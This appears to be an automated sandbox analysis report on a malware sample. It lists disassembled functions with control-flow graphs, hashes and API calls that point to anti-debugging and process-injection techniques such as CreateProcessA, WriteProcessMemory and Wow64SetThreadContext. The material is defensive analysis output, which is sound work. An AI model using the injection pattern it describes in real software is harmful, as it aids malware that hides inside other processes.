                                                                                          control_flow_graph 1145 61c2e08-61c2e8c CheckRemoteDebuggerPresent 1147 61c2e8e-61c2e94 1145->1147 1148 61c2e95-61c2ed0 1145->1148 1147->1148
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 061C2E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: bb70496e8f0d45808ad4bd909019cbca9ac645441e5df62c3ec03d3b650eec04
                                                                                          • Instruction ID: b4b001cd657d28168eb300246d91b715601865391c0281e5766de1c101c1ef5e
                                                                                          • Opcode Fuzzy Hash: bb70496e8f0d45808ad4bd909019cbca9ac645441e5df62c3ec03d3b650eec04
                                                                                          • Instruction Fuzzy Hash: 1B2128B1D002598FCB10CF9AD884BEEBBF4AF58320F14845AE459B7250D778A944CF61
                                                                                          Function 061C1BB8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: \VVm
                                                                                          • API String ID: 0-390912563
                                                                                          • Opcode ID: 0a2a686501ae83bc50213036a6d70e3a8e73a99240ac0ed54287f4966f6a9044
                                                                                          • Instruction ID: 3ded73c9e14fae106836d5ea567a6ad6c94fa4964ebf07f1544cebec52d77370
                                                                                          • Opcode Fuzzy Hash: 0a2a686501ae83bc50213036a6d70e3a8e73a99240ac0ed54287f4966f6a9044
                                                                                          • Instruction Fuzzy Hash: 51B17D70E40209DFDB54CFA9C8867EDBBF2AF98324F14852DE815E7295EB349845CB81
                                                                                          Function 061C4710 Relevance: .3, Instructions: 291COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: feabc9c9c5f46adf424039b757fac4548b8faece7bf44a6c6f5b8d2077f50923
                                                                                          • Instruction ID: 0c8d25eb32d2e4e60434537089efc13be4c1d549e8b6b1cbce944c544aaf23ec
                                                                                          • Opcode Fuzzy Hash: feabc9c9c5f46adf424039b757fac4548b8faece7bf44a6c6f5b8d2077f50923
                                                                                          • Instruction Fuzzy Hash: 74D11078B111488FCB84FB68FD9566D7BF2EF94311F209569A816AB394DB346D01CF80
                                                                                          Function 061C4720 Relevance: .3, Instructions: 284COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b461ccf7c013bdc7f90bfce8ae73630b8213efb53172f5a321e0012f789300e4
                                                                                          • Instruction ID: 50790b7b422e192f62ce0e3794e38b13718d5033f7bffde79f5961c39ba3f1bd
                                                                                          • Opcode Fuzzy Hash: b461ccf7c013bdc7f90bfce8ae73630b8213efb53172f5a321e0012f789300e4
                                                                                          • Instruction Fuzzy Hash: 79D1FE78B111488FCB84FBA9FD9566E77F2EF94211F209529A816AB394DF346D01CF80
                                                                                          Function 061C2488 Relevance: .3, Instructions: 266COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 507bc9c2d394c2de50a3ac18a95b545bd63957d651f8a6696e67caf1d2f03840
                                                                                          • Instruction ID: d4a76efa3c2dfddb0cd1d144ac8b0ffbd937970b2799306e6855efbee77b109a
                                                                                          • Opcode Fuzzy Hash: 507bc9c2d394c2de50a3ac18a95b545bd63957d651f8a6696e67caf1d2f03840
                                                                                          • Instruction Fuzzy Hash: 3BB15A70E002098FDB54CFA8C9917EEBBF2AF98324F14852DD815A7298EB749945CB91
                                                                                          Function 06284DC3 Relevance: 3.9, Strings: 3, Instructions: 139COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 823 6284dc3 824 6284dc7-6284dc9 823->824 825 6284dca-6284dcd 824->825 826 6284e59-6284e67 825->826 827 6284dce-6284dd3 825->827 839 6284f7f-6284f8d 826->839 852 6284e6d-6284e74 826->852 827->826 828 6284eea 827->828 829 6284eab-6284ee5 827->829 830 628502c-628503e 827->830 831 6284e2e-6284e3a 827->831 832 6285040 827->832 833 6284e79-6284ea6 827->833 834 6284dda-6284e14 827->834 835 6284fdb-6284fee 827->835 836 6284e3c-6284e4d 827->836 837 6284f9d-6284fcb 827->837 838 628501e-6285020 827->838 827->839 840 6284e16-6284e29 827->840 851 6284ef6-6284f7a 828->851 829->825 846 628500c-6285015 830->846 831->825 833->825 834->825 842 6284ff0-6285002 835->842 836->831 854 6284e4f-6284e54 836->854 837->828 865 6284fd1-6284fd6 837->865 838->832 841 6285022-628502a 838->841 839->833 855 6284f93-6284f98 839->855 840->842 841->846 842->846 846->830 857 6285017 846->857 851->825 852->824 854->825 855->825 857->830 857->832 857->838 865->825
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PHfq$`Qfq$`Qfq
                                                                                          • API String ID: 0-872445281
                                                                                          • Opcode ID: cb5ff0183b4d567a59e17b17a7eeceaded7cb3905f4aa633e69beb789a5eda10
                                                                                          • Instruction ID: 440bb4ea05e497233cd40ec7a95d883145ca293e57c802621d1b0b4154081d1d
                                                                                          • Opcode Fuzzy Hash: cb5ff0183b4d567a59e17b17a7eeceaded7cb3905f4aa633e69beb789a5eda10
                                                                                          • Instruction Fuzzy Hash: 1C515770A1131ACFEB65AF68D8547ADBBB1FB44300F104099E90AA7388DB745F82CF41
                                                                                          Function 061C5664 Relevance: 1.8, APIs: 1, Instructions: 272processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 978 61c5664-61c5668 979 61c566a-61c566d 978->979 980 61c5691-61c5705 978->980 981 61c566f-61c568f 979->981 982 61c55f6-61c5602 979->982 986 61c573e-61c575e 980->986 987 61c5707-61c5711 980->987 981->980 984 61c560b-61c5630 982->984 985 61c5604-61c560a 982->985 985->984 997 61c5797-61c57c6 986->997 998 61c5760-61c576a 986->998 987->986 988 61c5713-61c5715 987->988 991 61c5738-61c573b 988->991 992 61c5717-61c5721 988->992 991->986 994 61c5725-61c5734 992->994 995 61c5723 992->995 994->994 999 61c5736 994->999 995->994 1004 61c57ff-61c58b9 CreateProcessA 997->1004 1005 61c57c8-61c57d2 997->1005 998->997 1000 61c576c-61c576e 998->1000 999->991 1002 61c5770-61c577a 1000->1002 1003 61c5791-61c5794 1000->1003 1006 61c577c 1002->1006 1007 61c577e-61c578d 1002->1007 1003->997 1018 61c58bb-61c58c1 1004->1018 1019 61c58c2-61c5948 1004->1019 1005->1004 1009 61c57d4-61c57d6 1005->1009 1006->1007 1007->1007 1008 61c578f 1007->1008 1008->1003 1010 61c57d8-61c57e2 1009->1010 1011 61c57f9-61c57fc 1009->1011 1013 61c57e4 1010->1013 1014 61c57e6-61c57f5 1010->1014 1011->1004 1013->1014 1014->1014 1016 61c57f7 1014->1016 1016->1011 1018->1019 1029 61c5958-61c595c 1019->1029 1030 61c594a-61c594e 1019->1030 1032 61c596c-61c5970 1029->1032 1033 61c595e-61c5962 1029->1033 1030->1029 1031 61c5950 1030->1031 1031->1029 1035 61c5980-61c5984 1032->1035 1036 61c5972-61c5976 1032->1036 1033->1032 1034 61c5964 1033->1034 1034->1032 1038 61c5996-61c599d 1035->1038 1039 61c5986-61c598c 1035->1039 1036->1035 1037 61c5978 1036->1037 1037->1035 1040 61c599f-61c59ae 1038->1040 1041 61c59b4 1038->1041 1039->1038 1040->1041 1043 61c59b5 1041->1043 1043->1043
                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 061C58A6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: db29d6a9c7bc0d4adcefdde992ccae01b4af574a5b282e7b1a24a9bc016875fd
                                                                                          • Instruction ID: 19a74daa59e8f545c4400246dddb9b7fbcf0f936279e5de381c5dbd79cc7afe3
                                                                                          • Opcode Fuzzy Hash: db29d6a9c7bc0d4adcefdde992ccae01b4af574a5b282e7b1a24a9bc016875fd
                                                                                          • Instruction Fuzzy Hash: 87A16CB1D00319CFDB60CFA8C841BEDBBB2AF58320F1485A9D818A7240DB74A995DF91
                                                                                          Function 061C5670 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1044 61c5670-61c5705 1047 61c573e-61c575e 1044->1047 1048 61c5707-61c5711 1044->1048 1055 61c5797-61c57c6 1047->1055 1056 61c5760-61c576a 1047->1056 1048->1047 1049 61c5713-61c5715 1048->1049 1050 61c5738-61c573b 1049->1050 1051 61c5717-61c5721 1049->1051 1050->1047 1053 61c5725-61c5734 1051->1053 1054 61c5723 1051->1054 1053->1053 1057 61c5736 1053->1057 1054->1053 1062 61c57ff-61c58b9 CreateProcessA 1055->1062 1063 61c57c8-61c57d2 1055->1063 1056->1055 1058 61c576c-61c576e 1056->1058 1057->1050 1060 61c5770-61c577a 1058->1060 1061 61c5791-61c5794 1058->1061 1064 61c577c 1060->1064 1065 61c577e-61c578d 1060->1065 1061->1055 1076 61c58bb-61c58c1 1062->1076 1077 61c58c2-61c5948 1062->1077 1063->1062 1067 61c57d4-61c57d6 1063->1067 1064->1065 1065->1065 1066 61c578f 1065->1066 1066->1061 1068 61c57d8-61c57e2 1067->1068 1069 61c57f9-61c57fc 1067->1069 1071 61c57e4 1068->1071 1072 61c57e6-61c57f5 1068->1072 1069->1062 1071->1072 1072->1072 1074 61c57f7 1072->1074 1074->1069 1076->1077 1087 61c5958-61c595c 1077->1087 1088 61c594a-61c594e 1077->1088 1090 61c596c-61c5970 1087->1090 1091 61c595e-61c5962 1087->1091 1088->1087 1089 61c5950 1088->1089 1089->1087 1093 61c5980-61c5984 1090->1093 1094 61c5972-61c5976 1090->1094 1091->1090 1092 61c5964 1091->1092 1092->1090 1096 61c5996-61c599d 1093->1096 1097 61c5986-61c598c 1093->1097 1094->1093 1095 61c5978 1094->1095 1095->1093 1098 61c599f-61c59ae 1096->1098 1099 61c59b4 1096->1099 1097->1096 1098->1099 1101 61c59b5 1099->1101 1101->1101
                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 061C58A6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: ae4552b5af0e58d17df861c7b500b89dc285aad2ac92f51448733b39714f57e5
                                                                                          • Instruction ID: 022ca22df0bdeaf61f1afeec24c4bce951196c0dff966960762f04dec57ab8ed
                                                                                          • Opcode Fuzzy Hash: ae4552b5af0e58d17df861c7b500b89dc285aad2ac92f51448733b39714f57e5
                                                                                          • Instruction Fuzzy Hash: C8915AB1D00319CFDB60CFA9C841BEDBBB2EF58320F1485A9D818A7240DB74A995DF91
                                                                                          Function 061C5111 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1102 61c5111-61c513d 1103 61c513f-61c518b 1102->1103 1104 61c50c6-61c50e0 1102->1104 1108 61c518d-61c5199 1103->1108 1109 61c519b-61c51cb Wow64SetThreadContext 1103->1109 1108->1109 1112 61c51cd-61c51d3 1109->1112 1113 61c51d4-61c5204 1109->1113 1112->1113
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 061C51BE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 64c51caa5467b53d4b7d11f3f79fdcf4fb8e3643d54724ed6cf2cbd3530ce27a
                                                                                          • Instruction ID: ce3d8a9814b631fe4dee630e2a31d9e0b13f5aa71447a28cb027005a230d7223
                                                                                          • Opcode Fuzzy Hash: 64c51caa5467b53d4b7d11f3f79fdcf4fb8e3643d54724ed6cf2cbd3530ce27a
                                                                                          • Instruction Fuzzy Hash: 1531ABB2D043498FCB11CFA9C9857EEBFF4EF49320F14846AD558AB241DB34A944CBA1
                                                                                          Function 061C5380 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1117 61c5380-61c53ce 1119 61c53de-61c5412 WriteProcessMemory 1117->1119 1120 61c53d0-61c53dc 1117->1120 1122 61c5416-61c541d 1119->1122 1120->1119 1123 61c541f-61c5425 1122->1123 1124 61c5426-61c5456 1122->1124 1123->1124
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 061C5410
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 84c961b44eb689f6f47fbe6243f485c03a88204c178ebc5807093afba45c4d64
                                                                                          • Instruction ID: 7333f269d08f0198a29d66d6ff111ce449f011a11b26613c1da2f7ccc0158a11
                                                                                          • Opcode Fuzzy Hash: 84c961b44eb689f6f47fbe6243f485c03a88204c178ebc5807093afba45c4d64
                                                                                          • Instruction Fuzzy Hash: 49212AB1D103099FCB10CFA9C881BDEBBF5FF48320F108429E519A7240D778A550DB61
                                                                                          Function 061C537F Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1128 61c537f-61c53ce 1130 61c53de-61c5412 WriteProcessMemory 1128->1130 1131 61c53d0-61c53dc 1128->1131 1133 61c5416-61c541d 1130->1133 1131->1130 1134 61c541f-61c5425 1133->1134 1135 61c5426-61c5456 1133->1135 1134->1135
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 061C5410
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 6177dcab0babd846c4cf46cd66002810a820f78219035699f1d32190e052ec65
                                                                                          • Instruction ID: f6c130edd2c4bf9b9a7fb01b4d04d3ea01227cd3692adb2f0822ce73f9eb5430
                                                                                          • Opcode Fuzzy Hash: 6177dcab0babd846c4cf46cd66002810a820f78219035699f1d32190e052ec65
                                                                                          • Instruction Fuzzy Hash: 532125B5D103099FCB10CFA9C981BEEBBF5FF48320F10842AE919A7240D778A950DB61
                                                                                          Function 061C2E02 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1139 61c2e02-61c2e8c CheckRemoteDebuggerPresent 1141 61c2e8e-61c2e94 1139->1141 1142 61c2e95-61c2ed0 1139->1142 1141->1142
                                                                                          APIs
                                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 061C2E7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckDebuggerPresentRemote
                                                                                          • String ID:
                                                                                          • API String ID: 3662101638-0
                                                                                          • Opcode ID: 5e4a80a53861610965c95613a5be69949a269afbb910ef5f147612936f36682c
                                                                                          • Instruction ID: 321d3e0ebefc54cab44ba37914ab52beac1d24329cd95bd12ba9a40441d09d7a
                                                                                          • Opcode Fuzzy Hash: 5e4a80a53861610965c95613a5be69949a269afbb910ef5f147612936f36682c
                                                                                          • Instruction Fuzzy Hash: 0E2148B5D012598FCB10CFAAD985BEEBBF4AF58320F14845AE459B7241D3789944CF60
                                                                                          Function 061C50E8 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1151 61c50e8-61c50f4 1152 61c516c-61c518b 1151->1152 1153 61c50f6-61c5106 1151->1153 1156 61c518d-61c5199 1152->1156 1157 61c519b-61c51cb Wow64SetThreadContext 1152->1157 1154 61c510b-61c510c 1153->1154 1156->1157 1159 61c51cd-61c51d3 1157->1159 1160 61c51d4-61c5204 1157->1160 1159->1160
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 061C51BE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 0c0b68f563f3e3c983e3eeff70134be617a227afc6c7324f2d7ace97250f4f3e
                                                                                          • Instruction ID: aeab18e2b016580fb845c47fcb0392c4f480547dc998dd0b59162ff3e863d05c
                                                                                          • Opcode Fuzzy Hash: 0c0b68f563f3e3c983e3eeff70134be617a227afc6c7324f2d7ace97250f4f3e
                                                                                          • Instruction Fuzzy Hash: 6221AE719043098FDB00CFA9C8857EEBBF1EF98324F14842ED459AB241C7789A55CF61
                                                                                          Function 061C5140 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1164 61c5140-61c518b 1167 61c518d-61c5199 1164->1167 1168 61c519b-61c51cb Wow64SetThreadContext 1164->1168 1167->1168 1170 61c51cd-61c51d3 1168->1170 1171 61c51d4-61c5204 1168->1171 1170->1171
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 061C51BE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 830c537de4481b7fdcc0bf56872b8879edda918bf70c0e9415412704d7c2878d
                                                                                          • Instruction ID: 283c237b5c84f65efd2d5ae6c6963970b68f3a4d7836deb9bd99ee68879507e6
                                                                                          • Opcode Fuzzy Hash: 830c537de4481b7fdcc0bf56872b8879edda918bf70c0e9415412704d7c2878d
                                                                                          • Instruction Fuzzy Hash: F12138B1D003098FDB10DFAAC8857AEBBF5EF58324F14842AD419A7240C778A944CFA1
                                                                                          Function 061C5298 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 061C530E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 891cd8214fd5c11fa36275877084f292d56967385bb0625284035a0e248bea1a
                                                                                          • Instruction ID: 058d8a429fba460a4b251d1bb204649dbcc98fdece3743f2fd7c9d2f8a7c20b4
                                                                                          • Opcode Fuzzy Hash: 891cd8214fd5c11fa36275877084f292d56967385bb0625284035a0e248bea1a
                                                                                          • Instruction Fuzzy Hash: C42189B6900209CFCF10CFA9C945BEEBBF5EF48320F10881AE559AB250C775A510DFA1
                                                                                          Function 031C8970 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 031C89E4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1754219747.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_31c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          • Opcode ID: fabd121b7d8f52f183968d05773901cfbeb38ffd314b97ac274d83dc4706124d
                                                                                          • Instruction ID: 8ca75b63fa366d8a9411ab62b77ed907951f24a8a32add564537e34909045338
                                                                                          • Opcode Fuzzy Hash: fabd121b7d8f52f183968d05773901cfbeb38ffd314b97ac274d83dc4706124d
                                                                                          • Instruction Fuzzy Hash: BD1106B1D003499FDB10DFAAC985A9EFBF5FF98320F14842AD419A7250C775A940CFA1
                                                                                          Function 061C52A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 061C530E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760432669.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_61c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: b5cff058fadda881b66d2c6494c127b7157f316a755ed16fccd3dcff108dd310
                                                                                          • Instruction ID: 6a864acdc61e0703846031f9c7fdc0e32335c5f4bd44cd007ef610f6e1d02d97
                                                                                          • Opcode Fuzzy Hash: b5cff058fadda881b66d2c6494c127b7157f316a755ed16fccd3dcff108dd310
                                                                                          • Instruction Fuzzy Hash: A51137B19002499FCB10DFAAC845ADFBFF5EF88320F248419E519A7250C775A550DFA1
                                                                                          Function 0628BF50 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Dmq
                                                                                          • API String ID: 0-4031372824
                                                                                          • Opcode ID: f502d878943ba8ffb3d6a9a20079343e157278775b8e3f0e7da3da558eef8534
                                                                                          • Instruction ID: 0cd732e30433d45e54938a8feffeb01327fa60d9b8c6374f0f7f713064fbf59f
                                                                                          • Opcode Fuzzy Hash: f502d878943ba8ffb3d6a9a20079343e157278775b8e3f0e7da3da558eef8534
                                                                                          • Instruction Fuzzy Hash: ED91C274B116018FCB54EF2CD894A6ABBF2FF89310F1185A9D8159B3A1DB34EC42CB91
                                                                                          Function 031C8B40 Relevance: 1.3, APIs: 1, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1754219747.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_31c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandle
                                                                                          • String ID:
                                                                                          • API String ID: 2962429428-0
                                                                                          • Opcode ID: 01e13988d13e0417c21ffdefe89a6f7f2617fa249fc7fba561a239ec12789874
                                                                                          • Instruction ID: 79ab6df0d6f33a70e7e81ecd38a9b773330fd6beaae1aed71111cf6db23a880c
                                                                                          • Opcode Fuzzy Hash: 01e13988d13e0417c21ffdefe89a6f7f2617fa249fc7fba561a239ec12789874
                                                                                          • Instruction Fuzzy Hash: 68113AB1D103498FDB20DFAAC9457DEFBF5EF98324F248419D529A7240C775A540CB91
                                                                                          Function 0628FC10 Relevance: .2, Instructions: 166COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d0bae47a4abd1c2532babd0f97471df4a564dedab1b5a577a6f4d0786bf47123
                                                                                          • Instruction ID: 5da341fa62ab66b7764f1517a4190f11f55b76712ac4e970b4b1b157995c82bc
                                                                                          • Opcode Fuzzy Hash: d0bae47a4abd1c2532babd0f97471df4a564dedab1b5a577a6f4d0786bf47123
                                                                                          • Instruction Fuzzy Hash: 35514A38B211448FD784BB68E89972E37E2EBD9711F508128ED02D7385DF389D05CB92
                                                                                          Function 06287B70 Relevance: .1, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d4239167851f99995b144a24b0356132464c986a30a20d75a5678fe5ee6ffc60
                                                                                          • Instruction ID: c36964f21664795e3a2300a5ac8eff6fd552db619c5416b7db2e9694d1550f6a
                                                                                          • Opcode Fuzzy Hash: d4239167851f99995b144a24b0356132464c986a30a20d75a5678fe5ee6ffc60
